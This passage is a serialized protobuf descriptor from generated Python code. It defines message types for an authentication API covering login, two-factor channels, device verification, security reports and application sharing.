\x01(\x0c\x12\x1d\n\x15\x65ncryptedSessionToken\x18\x07 \x01(\x0c\x12:\n\x10sessionTokenType\x18\x08 \x01(\x0e\x32 .Authentication.SessionTokenType\x12\x0f\n\x07message\x18\t \x01(\t\x12\x0b\n\x03url\x18\n \x01(\t\x12\x36\n\x08\x63hannels\x18\x0b \x03(\x0b\x32$.Authentication.TwoFactorChannelInfo\x12\"\n\x04salt\x18\x0c \x03(\x0b\x32\x14.Authentication.Salt\x12\x11\n\tcloneCode\x18\r \x01(\x0c\x12\x1a\n\x12stateSpecificValue\x18\x0e \x01(\t\x12\x18\n\x10ssoClientVersion\x18\x0f \x01(\t\"\x8c\x01\n\x0bSsoUserInfo\x12\x13\n\x0b\x63ompanyName\x18\x01'
    b' \x01(\t\x12\x13\n\x0bsamlRequest\x18\x02 \x01(\t\x12\x17\n\x0fsamlRequestType\x18\x03 \x01(\t\x12\x15\n\rssoDomainName\x18\x04 \x01(\t\x12\x10\n\x08loginUrl\x18\x05 \x01(\t\x12\x11\n\tlogoutUrl\x18\x06 \x01(\t\"\xd6\x01\n\x10PreLoginResponse\x12\x32\n\x0c\x64\x65viceStatus\x18\x01 \x01(\x0e\x32\x1c.Authentication.DeviceStatus\x12\"\n\x04salt\x18\x02 \x03(\x0b\x32\x14.Authentication.Salt\x12\x38\n\x0eOBSOLETE_FIELD\x18\x03 \x03(\x0b\x32 .Authentication.TwoFactorChannel\x12\x30\n\x0bssoUserInfo\x18\x04 \x01(\x0b\x32\x1b.Authentication.SsoUserInfo\"&\n\x12LoginAsUserRequest\x12\x10\n\x08username\x18\x01 \x01(\t\"W\n\x13LoginAsUserResponse\x12\x1d\n\x15\x65ncryptedSessionToken\x18\x01 \x01(\x0c\x12!\n\x19\x65ncryptedSharedAccountKey\x18\x02 \x01(\x0c\"\x84\x01\n\x17ValidateAuthHashRequest\x12\x36\n\x0epasswordMethod\x18\x01 \x01(\x0e\x32\x1e.Authentication.PasswordMethod\x12\x14\n\x0c\x61uthResponse\x18\x02 \x01(\x0c\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x03 \x01(\x0c\"\x88\x02\n\x14TwoFactorChannelInfo\x12\x39\n\x0b\x63hannelType\x18\x01 \x01(\x0e\x32$.Authentication.TwoFactorChannelType\x12\x13\n\x0b\x63hannel_uid\x18\x02 \x01(\x0c\x12\x13\n\x0b\x63hannelName\x18\x03 \x01(\t\x12\x11\n\tchallenge\x18\x04 \x01(\t\x12\x14\n\x0c\x63\x61pabilities\x18\x05 \x03(\t\x12\x13\n\x0bphoneNumber\x18\x06 \x01(\t\x12:\n\rmaxExpiration\x18\x07 \x01(\x0e\x32#.Authentication.TwoFactorExpiration\x12\x11\n\tcreatedOn\x18\x08 \x01(\x03\"d\n\x12TwoFactorDuoStatus\x12\x14\n\x0c\x63\x61pabilities\x18\x01 \x03(\t\x12\x13\n\x0bphoneNumber\x18\x02 \x01(\t\x12\x12\n\nenroll_url\x18\x03 \x01(\t\x12\x0f\n\x07message\x18\x04 \x01(\t\"\xc7\x01\n\x13TwoFactorAddRequest\x12\x39\n\x0b\x63hannelType\x18\x01 \x01(\x0e\x32$.Authentication.TwoFactorChannelType\x12\x13\n\x0b\x63hannel_uid\x18\x02 \x01(\x0c\x12\x13\n\x0b\x63hannelName\x18\x03 \x01(\t\x12\x13\n\x0bphoneNumber\x18\x04 \x01(\t\x12\x36\n\x0b\x64uoPushType\x18\x05'
    b' \x01(\x0e\x32!.Authentication.TwoFactorPushType\"B\n\x16TwoFactorRenameRequest\x12\x13\n\x0b\x63hannel_uid\x18\x01 \x01(\x0c\x12\x13\n\x0b\x63hannelName\x18\x02 \x01(\t\"=\n\x14TwoFactorAddResponse\x12\x11\n\tchallenge\x18\x01 \x01(\t\x12\x12\n\nbackupKeys\x18\x02 \x03(\t\"-\n\x16TwoFactorDeleteRequest\x12\x13\n\x0b\x63hannel_uid\x18\x01 \x01(\x0c\"a\n\x15TwoFactorListResponse\x12\x36\n\x08\x63hannels\x18\x01 \x03(\x0b\x32$.Authentication.TwoFactorChannelInfo\x12\x10\n\x08\x65xpireOn\x18\x02 \x01(\x03\"Y\n TwoFactorUpdateExpirationRequest\x12\x35\n\x08\x65xpireIn\x18\x01 \x01(\x0e\x32#.Authentication.TwoFactorExpiration\"\xc9\x01\n\x18TwoFactorValidateRequest\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x01 \x01(\x0c\x12\x35\n\tvalueType\x18\x02 \x01(\x0e\x32\".Authentication.TwoFactorValueType\x12\r\n\x05value\x18\x03 \x01(\t\x12\x13\n\x0b\x63hannel_uid\x18\x04 \x01(\x0c\x12\x35\n\x08\x65xpireIn\x18\x05 \x01(\x0e\x32#.Authentication.TwoFactorExpiration\"8\n\x19TwoFactorValidateResponse\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x01 \x01(\x0c\"\xb8\x01\n\x18TwoFactorSendPushRequest\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x01 \x01(\x0c\x12\x33\n\x08pushType\x18\x02 \x01(\x0e\x32!.Authentication.TwoFactorPushType\x12\x13\n\x0b\x63hannel_uid\x18\x03 \x01(\x0c\x12\x35\n\x08\x65xpireIn\x18\x04 \x01(\x0e\x32#.Authentication.TwoFactorExpiration\"\x83\x01\n\x07License\x12\x0f\n\x07\x63reated\x18\x01 \x01(\x03\x12\x12\n\nexpiration\x18\x02 \x01(\x03\x12\x34\n\rlicenseStatus\x18\x03 \x01(\x0e\x32\x1d.Authentication.LicenseStatus\x12\x0c\n\x04paid\x18\x04 \x01(\x08\x12\x0f\n\x07message\x18\x05 \x01(\t\"G\n\x0fOwnerlessRecord\x12\x11\n\trecordUid\x18\x01 \x01(\x0c\x12\x11\n\trecordKey\x18\x02 \x01(\x0c\x12\x0e\n\x06status\x18\x03 \x01(\x05\"L\n\x10OwnerlessRecords\x12\x38\n\x0fownerlessRecord\x18\x01 \x03(\x0b\x32\x1f.Authentication.OwnerlessRecord\"\xd7\x01\n\x0fUserAuthRequest\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\x12\x0c\n\x04salt\x18\x02 \x01(\x0c\x12\x12\n\niterations\x18\x03'
    b' \x01(\x05\x12\x1a\n\x12\x65ncryptedClientKey\x18\x04 \x01(\x0c\x12\x10\n\x08\x61uthHash\x18\x05 \x01(\x0c\x12\x18\n\x10\x65ncryptedDataKey\x18\x06 \x01(\x0c\x12,\n\tloginType\x18\x07 \x01(\x0e\x32\x19.Authentication.LoginType\x12\x0c\n\x04name\x18\x08 \x01(\t\x12\x11\n\talgorithm\x18\t \x01(\x05\"\x19\n\nUidRequest\x12\x0b\n\x03uid\x18\x01 \x03(\x0c\"\xab\x01\n\x13\x44\x65viceUpdateRequest\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x15\n\rclientVersion\x18\x02 \x01(\t\x12\x12\n\ndeviceName\x18\x03 \x01(\t\x12\x17\n\x0f\x64\x65vicePublicKey\x18\x04 \x01(\x0c\x12\x32\n\x0c\x64\x65viceStatus\x18\x05 \x01(\x0e\x32\x1c.Authentication.DeviceStatus\"\x81\x01\n\x1dRegisterDeviceInRegionRequest\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x15\n\rclientVersion\x18\x02 \x01(\t\x12\x12\n\ndeviceName\x18\x03 \x01(\t\x12\x17\n\x0f\x64\x65vicePublicKey\x18\x04 \x01(\x0c\"\xf8\x02\n\x13RegistrationRequest\x12\x30\n\x0b\x61uthRequest\x18\x01 \x01(\x0b\x32\x1b.Authentication.AuthRequest\x12\x38\n\x0fuserAuthRequest\x18\x02 \x01(\x0b\x32\x1f.Authentication.UserAuthRequest\x12\x1a\n\x12\x65ncryptedClientKey\x18\x03 \x01(\x0c\x12\x1b\n\x13\x65ncryptedPrivateKey\x18\x04 \x01(\x0c\x12\x11\n\tpublicKey\x18\x05 \x01(\x0c\x12\x18\n\x10verificationCode\x18\x06 \x01(\t\x12\x1e\n\x16\x64\x65precatedAuthHashHash\x18\x07 \x01(\x0c\x12$\n\x1c\x64\x65precatedEncryptedClientKey\x18\x08 \x01(\x0c\x12%\n\x1d\x64\x65precatedEncryptedPrivateKey\x18\t \x01(\x0c\x12\"\n\x1a\x64\x65precatedEncryptionParams\x18\n \x01(\x0c\"\xd0\x01\n\x16\x43onvertUserToV3Request\x12\x30\n\x0b\x61uthRequest\x18\x01 \x01(\x0b\x32\x1b.Authentication.AuthRequest\x12\x38\n\x0fuserAuthRequest\x18\x02 \x01(\x0b\x32\x1f.Authentication.UserAuthRequest\x12\x1a\n\x12\x65ncryptedClientKey\x18\x03 \x01(\x0c\x12\x1b\n\x13\x65ncryptedPrivateKey\x18\x04 \x01(\x0c\x12\x11\n\tpublicKey\x18\x05 \x01(\x0c\"$\n\x10RevisionResponse\x12\x10\n\x08revision\x18\x01'
    b' \x01(\x03\"&\n\x12\x43hangeEmailRequest\x12\x10\n\x08newEmail\x18\x01 \x01(\t\"8\n\x13\x43hangeEmailResponse\x12!\n\x19\x65ncryptedChangeEmailToken\x18\x01 \x01(\x0c\"6\n\x1d\x45mailVerificationLinkResponse\x12\x15\n\remailVerified\x18\x01 \x01(\x08\")\n\x0cSecurityData\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\x12\x0c\n\x04\x64\x61ta\x18\x02 \x01(\x0c\"\x91\x01\n\x13SecurityDataRequest\x12\x38\n\x12recordSecurityData\x18\x01 \x03(\x0b\x32\x1c.Authentication.SecurityData\x12@\n\x1amasterPasswordSecurityData\x18\x02 \x03(\x0b\x32\x1c.Authentication.SecurityData\"\xb5\x01\n\x1dSecurityReportIncrementalData\x12\x18\n\x10\x65nterpriseUserId\x18\x01 \x01(\x03\x12\x1b\n\x13\x63urrentSecurityData\x18\x02 \x01(\x0c\x12#\n\x1b\x63urrentSecurityDataRevision\x18\x03 \x01(\x03\x12\x17\n\x0foldSecurityData\x18\x04 \x01(\x0c\x12\x1f\n\x17oldSecurityDataRevision\x18\x05 \x01(\x03\"\xf5\x01\n\x0eSecurityReport\x12\x18\n\x10\x65nterpriseUserId\x18\x01 \x01(\x03\x12\x1b\n\x13\x65ncryptedReportData\x18\x02 \x01(\x0c\x12\x10\n\x08revision\x18\x03 \x01(\x03\x12\x11\n\ttwoFactor\x18\x04 \x01(\t\x12\x11\n\tlastLogin\x18\x05 \x01(\x03\x12\x1e\n\x16numberOfReusedPassword\x18\x06 \x01(\x05\x12T\n\x1dsecurityReportIncrementalData\x18\x07 \x03(\x0b\x32-.Authentication.SecurityReportIncrementalData\"S\n\x19SecurityReportSaveRequest\x12\x36\n\x0esecurityReport\x18\x01 \x03(\x0b\x32\x1e.Authentication.SecurityReport\")\n\x15SecurityReportRequest\x12\x10\n\x08\x66romPage\x18\x01 \x01(\x03\"\xb8\x01\n\x16SecurityReportResponse\x12\x1c\n\x14\x65nterprisePrivateKey\x18\x01 \x01(\x0c\x12\x36\n\x0esecurityReport\x18\x02 \x03(\x0b\x32\x1e.Authentication.SecurityReport\x12\x14\n\x0c\x61sOfRevision\x18\x03 \x01(\x03\x12\x10\n\x08\x66romPage\x18\x04 \x01(\x03\x12\x0e\n\x06toPage\x18\x05 \x01(\x03\x12\x10\n\x08\x63omplete\x18\x06 \x01(\x08\"\'\n\x16ReusedPasswordsRequest\x12\r\n\x05\x63ount\x18\x01 \x01(\x05\">\n\x14SummaryConsoleReport\x12\x12\n\nreportType\x18\x01 \x01(\x05\x12\x12\n\nreportData\x18\x02'
    b' \x01(\x0c\"|\n\x12\x43hangeToKeyTypeOne\x12/\n\nobjectType\x18\x01 \x01(\x0e\x32\x1b.Authentication.ObjectTypes\x12\x12\n\nprimaryUid\x18\x02 \x01(\x0c\x12\x14\n\x0csecondaryUid\x18\x03 \x01(\x0c\x12\x0b\n\x03key\x18\x04 \x01(\x0c\"[\n\x19\x43hangeToKeyTypeOneRequest\x12>\n\x12\x63hangeToKeyTypeOne\x18\x01 \x03(\x0b\x32\".Authentication.ChangeToKeyTypeOne\"U\n\x18\x43hangeToKeyTypeOneStatus\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\x12\x0c\n\x04type\x18\x02 \x01(\t\x12\x0e\n\x06status\x18\x03 \x01(\t\x12\x0e\n\x06reason\x18\x04 \x01(\t\"h\n\x1a\x43hangeToKeyTypeOneResponse\x12J\n\x18\x63hangeToKeyTypeOneStatus\x18\x01 \x03(\x0b\x32(.Authentication.ChangeToKeyTypeOneStatus\"!\n\x06SetKey\x12\n\n\x02id\x18\x01 \x01(\x03\x12\x0b\n\x03key\x18\x02 \x01(\x0c\"5\n\rSetKeyRequest\x12$\n\x04keys\x18\x01 \x03(\x0b\x32\x16.Authentication.SetKey\"\xf2\x04\n\x11\x43reateUserRequest\x12\x10\n\x08username\x18\x01 \x01(\t\x12\x14\n\x0c\x61uthVerifier\x18\x02 \x01(\x0c\x12\x18\n\x10\x65ncryptionParams\x18\x03 \x01(\x0c\x12\x14\n\x0crsaPublicKey\x18\x04 \x01(\x0c\x12\x1e\n\x16rsaEncryptedPrivateKey\x18\x05 \x01(\x0c\x12\x14\n\x0c\x65\x63\x63PublicKey\x18\x06 \x01(\x0c\x12\x1e\n\x16\x65\x63\x63\x45ncryptedPrivateKey\x18\x07 \x01(\x0c\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x08 \x01(\x0c\x12\x1a\n\x12\x65ncryptedClientKey\x18\t \x01(\x0c\x12\x15\n\rclientVersion\x18\n \x01(\t\x12\x1e\n\x16\x65ncryptedDeviceDataKey\x18\x0b \x01(\x0c\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x0c \x01(\x0c\x12\x19\n\x11messageSessionUid\x18\r \x01(\x0c\x12\x17\n\x0finstallReferrer\x18\x0e \x01(\t\x12\x0e\n\x06mccMNC\x18\x0f \x01(\x05\x12\x0b\n\x03mfg\x18\x10 \x01(\t\x12\r\n\x05model\x18\x11 \x01(\t\x12\r\n\x05\x62rand\x18\x12 \x01(\t\x12\x0f\n\x07product\x18\x13 \x01(\t\x12\x0e\n\x06\x64\x65vice\x18\x14 \x01(\t\x12\x0f\n\x07\x63\x61rrier\x18\x15 \x01(\t\x12\x18\n\x10verificationCode\x18\x16 \x01(\t\x12\x42\n\x16\x65nterpriseRegistration\x18\x17'
    b' \x01(\x0b\x32\".Enterprise.EnterpriseRegistration\x12\"\n\x1a\x65ncryptedVerificationToken\x18\x18 \x01(\x0c\"W\n!NodeEnforcementAddOrUpdateRequest\x12\x0e\n\x06nodeId\x18\x01 \x01(\x03\x12\x13\n\x0b\x65nforcement\x18\x02 \x01(\t\x12\r\n\x05value\x18\x03 \x01(\t\"C\n\x1cNodeEnforcementRemoveRequest\x12\x0e\n\x06nodeId\x18\x01 \x01(\x03\x12\x13\n\x0b\x65nforcement\x18\x02 \x01(\t\"\x9f\x01\n\x0f\x41piRequestByKey\x12\r\n\x05keyId\x18\x01 \x01(\x05\x12\x0f\n\x07payload\x18\x02 \x01(\x0c\x12\x10\n\x08username\x18\x03 \x01(\t\x12\x0e\n\x06locale\x18\x04 \x01(\t\x12<\n\x11supportedLanguage\x18\x05 \x01(\x0e\x32!.Authentication.SupportedLanguage\x12\x0c\n\x04type\x18\x06 \x01(\x05\".\n\x0fMemcacheRequest\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x0e\n\x06userId\x18\x02 \x01(\x05\".\n\x10MemcacheResponse\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t\"w\n\x1cMasterPasswordReentryRequest\x12\x16\n\x0epbkdf2Password\x18\x01 \x01(\t\x12?\n\x06\x61\x63tion\x18\x02 \x01(\x0e\x32/.Authentication.MasterPasswordReentryActionType\"_\n\x19\x44\x65viceRegistrationRequest\x12\x15\n\rclientVersion\x18\x01 \x01(\t\x12\x12\n\ndeviceName\x18\x02 \x01(\t\x12\x17\n\x0f\x64\x65vicePublicKey\x18\x03 \x01(\x0c\"\x9a\x01\n\x19\x44\x65viceVerificationRequest\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x10\n\x08username\x18\x02 \x01(\t\x12\x1b\n\x13verificationChannel\x18\x03 \x01(\t\x12\x19\n\x11messageSessionUid\x18\x04 \x01(\x0c\x12\x15\n\rclientVersion\x18\x05 \x01(\t\"\xb2\x01\n\x1a\x44\x65viceVerificationResponse\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x10\n\x08username\x18\x02 \x01(\t\x12\x19\n\x11messageSessionUid\x18\x03 \x01(\x0c\x12\x15\n\rclientVersion\x18\x04 \x01(\t\x12\x32\n\x0c\x64\x65viceStatus\x18\x05 \x01(\x0e\x32\x1c.Authentication.DeviceStatus\"\xc8\x01\n\x15\x44\x65viceApprovalRequest\x12\r\n\x05\x65mail\x18\x01 \x01(\t\x12\x18\n\x10twoFactorChannel\x18\x02 \x01(\t\x12\x15\n\rclientVersion\x18\x03'
    b' \x01(\t\x12\x0e\n\x06locale\x18\x04 \x01(\t\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x05 \x01(\x0c\x12\x10\n\x08totpCode\x18\x06 \x01(\t\x12\x10\n\x08\x64\x65viceIp\x18\x07 \x01(\t\x12\x1d\n\x15\x64\x65viceTokenExpireDays\x18\x08 \x01(\t\"9\n\x16\x44\x65viceApprovalResponse\x12\x1f\n\x17\x65ncryptedTwoFactorToken\x18\x01 \x01(\x0c\"~\n\x14\x41pproveDeviceRequest\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x1e\n\x16\x65ncryptedDeviceDataKey\x18\x02 \x01(\x0c\x12\x14\n\x0c\x64\x65nyApproval\x18\x03 \x01(\x08\x12\x12\n\nlinkDevice\x18\x04 \x01(\x08\"E\n\x1a\x45nterpriseUserAliasRequest\x12\x18\n\x10\x65nterpriseUserId\x18\x01 \x01(\x03\x12\r\n\x05\x61lias\x18\x02 \x01(\t\"Y\n\x1d\x45nterpriseUserAddAliasRequest\x12\x18\n\x10\x65nterpriseUserId\x18\x01 \x01(\x03\x12\r\n\x05\x61lias\x18\x02 \x01(\t\x12\x0f\n\x07primary\x18\x03 \x01(\x08\"&\n\x06\x44\x65vice\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\"\\\n\x1cRegisterDeviceDataKeyRequest\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x1e\n\x16\x65ncryptedDeviceDataKey\x18\x02 \x01(\x0c\"n\n)ValidateCreateUserVerificationCodeRequest\x12\x10\n\x08username\x18\x01 \x01(\t\x12\x15\n\rclientVersion\x18\x02 \x01(\t\x12\x18\n\x10verificationCode\x18\x03 \x01(\t\"\xa3\x01\n%ValidateDeviceVerificationCodeRequest\x12\x10\n\x08username\x18\x01 \x01(\t\x12\x15\n\rclientVersion\x18\x02 \x01(\t\x12\x18\n\x10verificationCode\x18\x03 \x01(\t\x12\x19\n\x11messageSessionUid\x18\x04 \x01(\x0c\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x05 \x01(\x0c\"Y\n\x19SendSessionMessageRequest\x12\x19\n\x11messageSessionUid\x18\x01 \x01(\x0c\x12\x0f\n\x07\x63ommand\x18\x02 \x01(\t\x12\x10\n\x08username\x18\x03 \x01(\t\"M\n\x11GlobalUserAccount\x12\x10\n\x08username\x18\x01 \x01(\t\x12\x12\n\naccountUid\x18\x02 \x01(\x0c\x12\x12\n\nregionName\x18\x03 \x01(\t\"7\n\x0f\x41\x63\x63ountUsername\x12\x10\n\x08username\x18\x01 \x01(\t\x12\x12\n\ndateActive\x18\x02'
    b' \x01(\t\"P\n\x19SsoServiceProviderRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x15\n\rclientVersion\x18\x02 \x01(\t\x12\x0e\n\x06locale\x18\x03 \x01(\t\"a\n\x1aSsoServiceProviderResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05spUrl\x18\x02 \x01(\t\x12\x0f\n\x07isCloud\x18\x03 \x01(\x08\x12\x15\n\rclientVersion\x18\x04 \x01(\t\"4\n\x12UserSettingRequest\x12\x0f\n\x07setting\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t\"f\n\rThrottleState\x12*\n\x04type\x18\x01 \x01(\x0e\x32\x1c.Authentication.ThrottleType\x12\x0b\n\x03key\x18\x02 \x01(\t\x12\r\n\x05value\x18\x03 \x01(\t\x12\r\n\x05state\x18\x04 \x01(\x08\"\xb5\x01\n\x0eThrottleState2\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x16\n\x0ekeyDescription\x18\x02 \x01(\t\x12\r\n\x05value\x18\x03 \x01(\t\x12\x18\n\x10valueDescription\x18\x04 \x01(\t\x12\x12\n\nidentifier\x18\x05 \x01(\t\x12\x0e\n\x06locked\x18\x06 \x01(\x08\x12\x1a\n\x12includedInAllClear\x18\x07 \x01(\x08\x12\x15\n\rexpireSeconds\x18\x08 \x01(\x05\"\x97\x01\n\x11\x44\x65viceInformation\x12\x10\n\x08\x64\x65viceId\x18\x01 \x01(\x03\x12\x12\n\ndeviceName\x18\x02 \x01(\t\x12\x15\n\rclientVersion\x18\x03 \x01(\t\x12\x11\n\tlastLogin\x18\x04 \x01(\x03\x12\x32\n\x0c\x64\x65viceStatus\x18\x05 \x01(\x0e\x32\x1c.Authentication.DeviceStatus\"*\n\x0bUserSetting\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x08\".\n\x12UserDataKeyRequest\x12\x18\n\x10\x65nterpriseUserId\x18\x01 \x03(\x03\"Q\n\x1b\x45nterpriseUserIdDataKeyPair\x12\x18\n\x10\x65nterpriseUserId\x18\x01 \x01(\x03\x12\x18\n\x10\x65ncryptedDataKey\x18\x02 \x01(\x0c\"\x95\x01\n\x0bUserDataKey\x12\x0e\n\x06roleId\x18\x01 \x01(\x03\x12\x0f\n\x07roleKey\x18\x02 \x01(\x0c\x12\x12\n\nprivateKey\x18\x03 \x01(\t\x12Q\n\x1c\x65nterpriseUserIdDataKeyPairs\x18\x04 \x03(\x0b\x32+.Authentication.EnterpriseUserIdDataKeyPair\"z\n\x13UserDataKeyResponse\x12\x31\n\x0cuserDataKeys\x18\x01 \x03(\x0b\x32\x1b.Authentication.UserDataKey\x12\x14\n\x0c\x61\x63\x63\x65ssDenied\x18\x02'
    b' \x03(\x03\x12\x1a\n\x12noEncryptedDataKey\x18\x03 \x03(\x03\"H\n)MasterPasswordRecoveryVerificationRequest\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x01 \x01(\x0c\"U\n\x1cGetSecurityQuestionV3Request\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x01 \x01(\x0c\x12\x18\n\x10verificationCode\x18\x02 \x01(\t\"r\n\x1dGetSecurityQuestionV3Response\x12\x18\n\x10securityQuestion\x18\x01 \x01(\t\x12\x15\n\rbackupKeyDate\x18\x02 \x01(\x03\x12\x0c\n\x04salt\x18\x03 \x01(\x0c\x12\x12\n\niterations\x18\x04 \x01(\x05\"n\n\x19GetDataKeyBackupV3Request\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x01 \x01(\x0c\x12\x18\n\x10verificationCode\x18\x02 \x01(\t\x12\x1a\n\x12securityAnswerHash\x18\x03 \x01(\x0c\"v\n\rPasswordRules\x12\x10\n\x08ruleType\x18\x01 \x01(\t\x12\r\n\x05match\x18\x02 \x01(\x08\x12\x0f\n\x07pattern\x18\x03 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x04 \x01(\t\x12\x0f\n\x07minimum\x18\x05 \x01(\x05\x12\r\n\x05value\x18\x06 \x01(\t\"\xa3\x02\n\x1aGetDataKeyBackupV3Response\x12\x15\n\rdataKeyBackup\x18\x01 \x01(\x0c\x12\x19\n\x11\x64\x61taKeyBackupDate\x18\x02 \x01(\x03\x12\x11\n\tpublicKey\x18\x03 \x01(\x0c\x12\x1b\n\x13\x65ncryptedPrivateKey\x18\x04 \x01(\x0c\x12\x11\n\tclientKey\x18\x05 \x01(\x0c\x12\x1d\n\x15\x65ncryptedSessionToken\x18\x06 \x01(\x0c\x12\x34\n\rpasswordRules\x18\x07 \x03(\x0b\x32\x1d.Authentication.PasswordRules\x12\x1a\n\x12passwordRulesIntro\x18\x08 \x01(\t\x12\x1f\n\x17minimumPbkdf2Iterations\x18\t \x01(\x05\")\n\x14GetPublicKeysRequest\x12\x11\n\tusernames\x18\x01 \x03(\t\"r\n\x11PublicKeyResponse\x12\x10\n\x08username\x18\x01 \x01(\t\x12\x11\n\tpublicKey\x18\x02 \x01(\x0c\x12\x14\n\x0cpublicEccKey\x18\x03 \x01(\x0c\x12\x0f\n\x07message\x18\x04 \x01(\t\x12\x11\n\terrorCode\x18\x05 \x01(\t\"P\n\x15GetPublicKeysResponse\x12\x37\n\x0ckeyResponses\x18\x01 \x03(\x0b\x32!.Authentication.PublicKeyResponse\"F\n\x14SetEccKeyPairRequest\x12\x11\n\tpublicKey\x18\x01 \x01(\x0c\x12\x1b\n\x13\x65ncryptedPrivateKey\x18\x02'
    b' \x01(\x0c\"X\n\x13\x41\x64\x64\x41ppSharesRequest\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x01(\x0c\x12+\n\x06shares\x18\x02 \x03(\x0b\x32\x1b.Authentication.AppShareAdd\">\n\x16RemoveAppSharesRequest\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x01(\x0c\x12\x0e\n\x06shares\x18\x02 \x03(\x0c\"\x87\x01\n\x0b\x41ppShareAdd\x12\x11\n\tsecretUid\x18\x02 \x01(\x0c\x12\x37\n\tshareType\x18\x03 \x01(\x0e\x32$.Authentication.ApplicationShareType\x12\x1a\n\x12\x65ncryptedSecretKey\x18\x04 \x01(\x0c\x12\x10\n\x08\x65\x64itable\x18\x05 \x01(\x08\"{\n\x08\x41ppShare\x12\x11\n\tsecretUid\x18\x01 \x01(\x0c\x12\x37\n\tshareType\x18\x02 \x01(\x0e\x32$.Authentication.ApplicationShareType\x12\x10\n\x08\x65\x64itable\x18\x03 \x01(\x08\x12\x11\n\tcreatedOn\x18\x04 \x01(\x03\"\xa7\x01\n\x13\x41\x64\x64\x41ppClientRequest\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x01(\x0c\x12\x17\n\x0f\x65ncryptedAppKey\x18\x02 \x01(\x0c\x12\x10\n\x08\x63lientId\x18\x03 \x01(\x0c\x12\x0e\n\x06lockIp\x18\x04 \x01(\x08\x12\x1b\n\x13\x66irstAccessExpireOn\x18\x05 \x01(\x03\x12\x16\n\x0e\x61\x63\x63\x65ssExpireOn\x18\x06 \x01(\x03\x12\n\n\x02id\x18\x07 \x01(\t\"@\n\x17RemoveAppClientsRequest\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x01(\x0c\x12\x0f\n\x07\x63lients\x18\x02 \x03(\x0c\"~\n\x17\x41\x64\x64\x45xternalShareRequest\x12\x11\n\trecordUid\x18\x01 \x01(\x0c\x12\x1a\n\x12\x65ncryptedRecordKey\x18\x02 \x01(\x0c\x12\x10\n\x08\x63lientId\x18\x03 \x01(\x0c\x12\x16\n\x0e\x61\x63\x63\x65ssExpireOn\x18\x04 \x01(\x03\x12\n\n\x02id\x18\x05 \x01(\t\"\xd0\x01\n\tAppClient\x12\n\n\x02id\x18\x01 \x01(\t\x12\x10\n\x08\x63lientId\x18\x02 \x01(\x0c\x12\x11\n\tcreatedOn\x18\x03 \x01(\x03\x12\x13\n\x0b\x66irstAccess\x18\x04 \x01(\x03\x12\x12\n\nlastAccess\x18\x05 \x01(\x03\x12\x11\n\tpublicKey\x18\x06 \x01(\x0c\x12\x0e\n\x06lockIp\x18\x07 \x01(\x08\x12\x11\n\tipAddress\x18\x08 \x01(\t\x12\x1b\n\x13\x66irstAccessExpireOn\x18\t \x01(\x03\x12\x16\n\x0e\x61\x63\x63\x65ssExpireOn\x18\n'
    b' \x01(\x03\")\n\x11GetAppInfoRequest\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x03(\x0c\"\x8e\x01\n\x07\x41ppInfo\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x01(\x0c\x12(\n\x06shares\x18\x02 \x03(\x0b\x32\x18.Authentication.AppShare\x12*\n\x07\x63lients\x18\x03 \x03(\x0b\x32\x19.Authentication.AppClient\x12\x17\n\x0fisExternalShare\x18\x04 \x01(\x08\">\n\x12GetAppInfoResponse\x12(\n\x07\x61ppInfo\x18\x01 \x03(\x0b\x32\x17.Authentication.AppInfo\"\xb2\x01\n\x12\x41pplicationSummary\x12\x14\n\x0c\x61ppRecordUid\x18\x01 \x01(\x0c\x12\x12\n\nlastAccess\x18\x02 \x01(\x03\x12\x14\n\x0crecordShares\x18\x03 \x01(\x05\x12\x14\n\x0c\x66olderShares\x18\x04 \x01(\x05\x12\x15\n\rfolderRecords\x18\x05 \x01(\x05\x12\x13\n\x0b\x63lientCount\x18\x06 \x01(\x05\x12\x1a\n\x12\x65xpiredClientCount\x18\x07 \x01(\x05\"`\n\x1eGetApplicationsSummaryResponse\x12>\n\x12\x61pplicationSummary\x18\x01 \x03(\x0b\x32\".Authentication.ApplicationSummary\"/\n\x1bGetVerificationTokenRequest\x12\x10\n\x08username\x18\x01 \x01(\t\"B\n\x1cGetVerificationTokenResponse\x12\"\n\x1a\x65ncryptedVerificationToken\x18\x01 \x01(\x0c\"\'\n\x16SendShareInviteRequest\x12\r\n\x05\x65mail\x18\x01 \x01(\t\"\xc5\x01\n\x18TimeLimitedAccessRequest\x12\x12\n\naccountUid\x18\x01 